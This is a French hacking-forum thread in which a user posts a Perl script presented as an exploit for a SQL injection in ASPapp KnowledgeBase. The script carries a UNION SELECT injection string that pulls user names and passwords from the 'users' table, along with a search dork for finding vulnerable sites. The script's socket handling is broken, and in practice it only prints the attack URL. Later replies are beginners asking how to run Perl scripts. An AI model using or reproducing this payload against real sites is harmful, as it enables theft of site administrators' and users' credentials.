[Perl] ASPapp KnowledgeBase "union" sql injection

Moderator: Mod

[Perl] ASPapp KnowledgeBase "union" sql injection

Postby kmkz » Sun Apr 06, 2008 9:11 am

yop!

Juste un petit exploit codé a titre d'exemple ,avec Dannyblue (son 1er script Perl ^^ donc soyez pas méchant hein ;) )
Je le poste ici car il peu etre utilisé a titre d'exemple pour ceux qui voudrai , comme Dannyblue ,se lancer dans le Scripting Perl .

Attention , cet exploit exploite malgrés tout une faille qui est encore assez présente sur le web , aussi je tien a demander a ceux qui le testeront de RESPECTER le travail des admins et ainsi , de ne pas s'en servir a des fins destructrices .
Merci .
[code:1:2873f9cd93]#!/usr/local/bin/perl -w

use strict;
use IO::Socket::INET;

my $hote=$ARGV[0];
if (@ARGV < 1)

{
die "\n[0]-Usage: perl exploit.pl [Host] \n
Entrer l'URL de la cible (exemple: www.target.fr/content_by_cat.asp) \n\n
------------------------------------------------------------------------
- -
- Injection SQL ASPapp KnowledgeBase -
- -
-[~]Exploit coded By: KmkZ and DannyBlue of LiQuid Squad team -
- -
-[~] Bug found by :XCoRPITX --> www.xcorpitx-hack.com -
- -
- Dork: "content_by_cat.asp" -
- -
- Arguments : [URL]/content_by_cat.asp -
- -
------------------------------------------------------------------------\n
";
}
else
{
my $injection="?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users";
my $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAdr=>"$hote",PeerPort=>"80");
$socket = ("$hote$injection");
print "[~] URL =>\n\n";
print $socket;
print "\n\n";
exit;
}[/code:1:2873f9cd93]
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Postby Manu404 » Sun Apr 06, 2008 9:46 am

Good Work man ! :wink:
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby ARTENGO » Sun Jul 12, 2009 6:26 pm

Salut sa ma l'air interessant mais moi g un probleme quand je met ce code et que j'enrengistre quand je veut ouvrir sa m'affiche une MS DOS mais sa la ferme immediatement que faire ? :cry:
ARTENGO
Projets
 
Posts: 1
Joined: Sun Jul 12, 2009 4:49 pm

Postby TorTukiTu » Sun Jul 12, 2009 8:55 pm

Artengo, quand tu demandes à windaube de faire interpréter un script perl, celui-ci ferme le shell dès que l'execution du script est terminé.

Tu dois faire démarrer ==> executer ==> cmd.

Ensuite, tu fais bosser l'interpréteur perl sur le fichier.

Juste un conseil, avant d'essayer d'exécuter des exploits, il faudrait que tu conaîses les bases de la programmation. Vas faire un tour dans la section culture et sur le site du zéro.

hxxp://www.siteduzero.com/

La tortue.
User avatar
TorTukiTu
Site Admin
 
Posts: 1960
Joined: Thu Feb 07, 2008 10:24 pm
Location: Devant son pc durant la redaction de ce message

Postby LOVEISDEAD » Sat Jul 18, 2009 3:53 pm

je ne comprend rien est ce qu'il faut un compilateur ? est sa ne marche pas avec cmd ? comment sa se fait . merci tout le monde d'avance .
User avatar
LOVEISDEAD
Projets
 
Posts: 5
Joined: Mon Jun 22, 2009 7:21 am

Postby TorTukiTu » Sat Jul 18, 2009 4:20 pm

Il te faut un interpréteur. Ce n'est pas un compilateur.

Tu lances un shell et tu exécutes le binaire qui est ton interpréteur (que tu auras précédemment téléchargé).

Ensuite tu lui fais gentiment manger le script que tu veux.

L'installeur de l'interpréteur ActivePerl (pour window$):
hxxp://static.commentcamarche.net/www.commentcamarche.net/download/files/ActivePerl-5.6.1.629-MSWin32-x86-multi-thread.msi

Voici ce que contient myscript.pl :
[code:1:b48ce2e8d7]
#!/usr/local/bin/perl
#
# script tout bete
#
print 'Salut le monde.';
[/code:1:b48ce2e8d7]
[code:1:b48ce2e8d7]
Ensuite démarrer => exécuter => cmd

Microsoft Windows [version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. Tous droits réservés.

C:\Users\TorTukiTu>perl myscript.pl
Salut tout le monde.
[/code:1:b48ce2e8d7]

Renseigne toi sur google pour plus de détails.
La tortue.
User avatar
TorTukiTu
Site Admin
 
Posts: 1960
Joined: Thu Feb 07, 2008 10:24 pm
Location: Devant son pc durant la redaction de ce message

Postby LOVEISDEAD » Sat Jul 18, 2009 9:25 pm

merci beaucoup
User avatar
LOVEISDEAD
Projets
 
Posts: 5
Joined: Mon Jun 22, 2009 7:21 am


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 2 guests

cron